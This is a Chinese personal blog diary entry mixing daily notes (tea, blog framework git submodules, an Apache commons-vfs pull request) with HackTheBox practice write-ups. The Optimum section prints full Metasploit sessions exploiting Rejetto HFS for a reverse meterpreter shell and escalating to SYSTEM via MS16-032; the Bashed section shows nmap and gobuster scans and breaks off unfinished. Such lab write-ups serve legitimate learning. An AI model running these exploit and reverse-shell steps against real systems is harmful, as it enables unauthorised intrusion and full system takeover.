2021/3/28的修行

字数统计: 2.3k字   |   阅读时长≈ 12分

B站2000天

在B站的第2000天……

时间 好快啊

嗯 那今天吃点好的吧

要开心起来才行呢0u0

下午 烧出了美好的茶

颜色非常美丽,像酒红色的宝石一样

……喝起来半分苦涩、半分甘甜……有趣

原料是廉价金骏眉若干、罗汉果半个、农夫山泉1.5L左右,烧10分钟即可

美好的茶

喝着茶 悠哉游哉地度过周日的下午吧~

收获教训一个:

打站的时候一定要挂一个command line 去一直ping这个IP

不然 有时候网络条件不是那么靠谱

和htb之间的vpn死了的话 都不知道 那就很烦

1. 对博客的框架层做版本控制

原本只打算做content的管理

现在发现有时候我偶尔也会想定制下framework

那么对framework也要上version control咯 = =

这样的话,做个git submodule是个很好的主意

毕竟submodule这种设计大概也就只有这种场景能用上了

嘛,不过我之前也没实际操作过submodule系的东西

正好作为修行了

现在 framework层在https://github.com/XenoAmess/XenoAmessBlogFramework

现在 content层在https://github.com/XenoAmess/XenoAmessBlog.git

2. 帮vfs人看看他们到底自己尝试“用更优雅的方法” 修复我修过的这个bug 的时候做错了什么事 以至于修正失败

https://github.com/apache/commons-vfs/pull/168

。。。看了。

噗。

说了别这么搞……

算了算了 也挺可爱的不是么

3. 塑形课(1.5倍量)

4. 继续学习《设计模式之禅》

5. 博客的主题从yilia迁移至yilia-plus

需要的点:

  • 飘雪特效
  • 访问量统计
  • 转载协议声明
  • 以及一些其他美化

6. 继续调整博客样式

7. HackTheBox Retired 【Optimum】打掉 (完全没看tutorial!)

7.1 nmap

惯例nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
$ nmap -v -A -Pn 10.129.1.127
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-28 21:33 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:33
Completed NSE at 21:33, 0.00s elapsed
Initiating NSE at 21:33
Completed NSE at 21:33, 0.00s elapsed
Initiating NSE at 21:33
Completed NSE at 21:33, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:33
Completed Parallel DNS resolution of 1 host. at 21:33, 0.00s elapsed
Initiating Connect Scan at 21:33
Scanning 10.129.1.127 [1000 ports]
Discovered open port 80/tcp on 10.129.1.127
Completed Connect Scan at 21:33, 16.79s elapsed (1000 total ports)
Initiating Service scan at 21:33
Scanning 1 service on 10.129.1.127
Completed Service scan at 21:34, 6.50s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.1.127.
Initiating NSE at 21:34
Completed NSE at 21:34, 10.52s elapsed
Initiating NSE at 21:34
Completed NSE at 21:34, 1.98s elapsed
Initiating NSE at 21:34
Completed NSE at 21:34, 0.00s elapsed
Nmap scan report for 10.129.1.127
Host is up (0.24s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION                                                                                                                                                                                                                                                             
80/tcp open  http    HttpFileServer httpd 2.3                                                                                                                                                                                                                                            
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1                                                                                                                                                                                                                    
| http-methods:                                                                                                                                                                                                                                                                          
|_  Supported Methods: GET POST                                                                                                                                                                                                                                                          
|_http-server-header: HFS 2.3                                                                                                                                                                                                                                                            
|_http-title: HFS /                                                                                                                                                                                                                                                                      
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                         
NSE: Script Post-scanning.                                                                                                                                                                                                                                                               
Initiating NSE at 21:34                                                                                                                                                                                                                                                                  
Completed NSE at 21:34, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 21:34                                                                                                                                                                                                                                                                  
Completed NSE at 21:34, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 21:34                                                                                                                                                                                                                                                                  
Completed NSE at 21:34, 0.00s elapsed                                                                                                                                                                                                                                                    
Read data files from: /usr/bin/../share/nmap                                                                                                                                                                                                                                             
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                                                                           
Nmap done: 1 IP address (1 host up) scanned in 36.67 seconds

7.2 信息搜集

浏览器打开80端口的http服务

点击左侧的HttpFileServer 2.3超链接

metasploit搜索rejetto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf6 > search Rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.18
LHOST => 10.10.14.18
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.129.1.127
RHOSTS => 10.129.1.127
msf6 exploit(windows/http/rejetto_hfs_exec) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.18:4444 
[*] Using URL: http://0.0.0.0:8080/gWY4UkmAU
[*] Local IP: http://192.168.10.128:8080/gWY4UkmAU
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /gWY4UkmAU
[*] Sending stage (175174 bytes) to 10.129.1.127
[*] Meterpreter session 1 opened (10.10.14.18:4444 -> 10.129.1.127:49162) at 2021-03-28 21:41:44 +0800
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\FvaLXjlNVNGN.vbs' on the target

meterpreter > 
[!] Tried to delete %TEMP%\FvaLXjlNVNGN.vbs, unknown result

meterpreter >

sysinfo:

1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

local_exploit_suggester

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.129.124.186 - Collecting local exploits for x86/windows...
[!] Tried to delete %TEMP%\QDDAp.vbs, unknown result
[*] 10.129.124.186 - 37 exploit checks are being tried...
[+] 10.129.124.186 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[-] 10.129.124.186 - Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
[-] 10.129.124.186 - Call stack:
[-] 10.129.124.186 -   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
[-] 10.129.124.186 -   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
[-] 10.129.124.186 -   /usr/share/metasploit-framework/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb:96:in `check'
[-] 10.129.124.186 -   /usr/share/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:121:in `block in run'
[-] 10.129.124.186 -   /usr/share/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:119:in `each'
[-] 10.129.124.186 -   /usr/share/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:119:in `run'

得到exploit/windows/local/bypassuac_eventvwr

用用看?

1
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module

看来没这么好的事233

算了算了,先拿到user再说……顺利拿到了

7.3 提权

google 搜索 windows 2012 r2 (6.3 build 9600) privilege escalation

得到MS16-032

https://www.youtube.com/watch?v=0IyBuGPU-ro

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
msf6 exploit(windows/http/rejetto_hfs_exec) > search MS16-032

Matching Modules
================

   #  Name                                                           Disclosure Date  Rank    Check  Description
   -  ----                                                           ---------------  ----    -----  -----------
   0  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  Yes    MS16-032 Secondary Logon Handle Privilege Escalation


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

msf6 exploit(windows/http/rejetto_hfs_exec) > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.18
LHOST => 10.10.14.18
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit

[*] Started reverse TCP handler on 10.10.14.18:4444 
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\itMlMEp.ps1...
[*] Compressing script contents...
[+] Compressed size: 3592
[*] Executing exploit script...
         __ __ ___ ___   ___     ___ ___ ___ 
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|
                                            
                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2516

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 1800
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[*] Sending stage (175174 bytes) to 10.129.1.127
[*] Meterpreter session 2 opened (10.10.14.18:4444 -> 10.129.1.127:49163) at 2021-03-28 23:16:58 +0800
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

tdvTXta9JrJKyds8O6WXJVKWi9Lb8Pdj
[+] Executed on target machine.
[+] Deleted C:\Users\kostas\AppData\Local\Temp\itMlMEp.ps1

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

OK, 后面shell一下切过去type就完事了,略。

8. HackTheBox Retired 【Bashed】打掉 (完全没看tutorial!) (进行中)

8.1 nmap

惯例nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
$ nmap -v -A -Pn 10.129.124.215
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-29 02:26 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:26
Completed NSE at 02:26, 0.00s elapsed
Initiating NSE at 02:26
Completed NSE at 02:26, 0.00s elapsed
Initiating NSE at 02:26
Completed NSE at 02:26, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 02:26
Completed Parallel DNS resolution of 1 host. at 02:26, 0.01s elapsed
Initiating Connect Scan at 02:26
Scanning 10.129.124.215 [1000 ports]
Discovered open port 80/tcp on 10.129.124.215
Increasing send delay for 10.129.124.215 from 0 to 5 due to 92 out of 305 dropped probes since last increase.
Increasing send delay for 10.129.124.215 from 5 to 10 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.124.215 from 10 to 20 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.124.215 from 20 to 40 due to max_successful_tryno increase to 5
Connect Scan Timing: About 48.46% done; ETC: 02:27 (0:00:33 remaining)
Completed Connect Scan at 02:27, 67.53s elapsed (1000 total ports)
Initiating Service scan at 02:27
Scanning 1 service on 10.129.124.215
Completed Service scan at 02:27, 7.48s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.124.215.
Initiating NSE at 02:27
Completed NSE at 02:27, 6.28s elapsed
Initiating NSE at 02:27
Completed NSE at 02:27, 1.18s elapsed
Initiating NSE at 02:27
Completed NSE at 02:27, 0.00s elapsed
Nmap scan report for 10.129.124.215
Host is up (0.23s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

NSE: Script Post-scanning.
Initiating NSE at 02:27
Completed NSE at 02:27, 0.00s elapsed
Initiating NSE at 02:27
Completed NSE at 02:27, 0.00s elapsed
Initiating NSE at 02:27
Completed NSE at 02:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.82 seconds

nmap结果显示应该只有80可以草

1
gobuster dir -u http://10.129.124.193:80/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
1
2
/images               (Status: 301) [Size: 317] [--> http://10.129.124.193/images/]
/uploads              (Status: 301) [Size: 318] [--> http://10.129.124.193/uploads/]

gobuster只找到images能用?

emm

好吧,http://10.129.124.193/images 走起了

嗯看上去是个静态文件服务器

得到版本号Apache/2.4.18 (Ubuntu)

那么这台机子还是个Ubuntu

8.2 信息搜集

……没找到能用的CVE

……

看了眼题解,跟我思路是一样的,就是gobuster出来这个php webshell的位置,然后连上去。。。

可是今天htb的连接太糟糕了,gobuster不能。nmap不能。甚至ping都一半时间ping不通。。。

溜了溜了

1
2
3
--- 10.129.124.193 ping statistics ---
969 packets transmitted, 121 received, 87.5129% packet loss, time 988167ms
rtt min/avg/max/mdev = 231.617/239.562/262.259/6.388 ms

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

自称为XenoAmess的方术师。

为了得到【意义】而进行各种各样的修行。

Hack The Box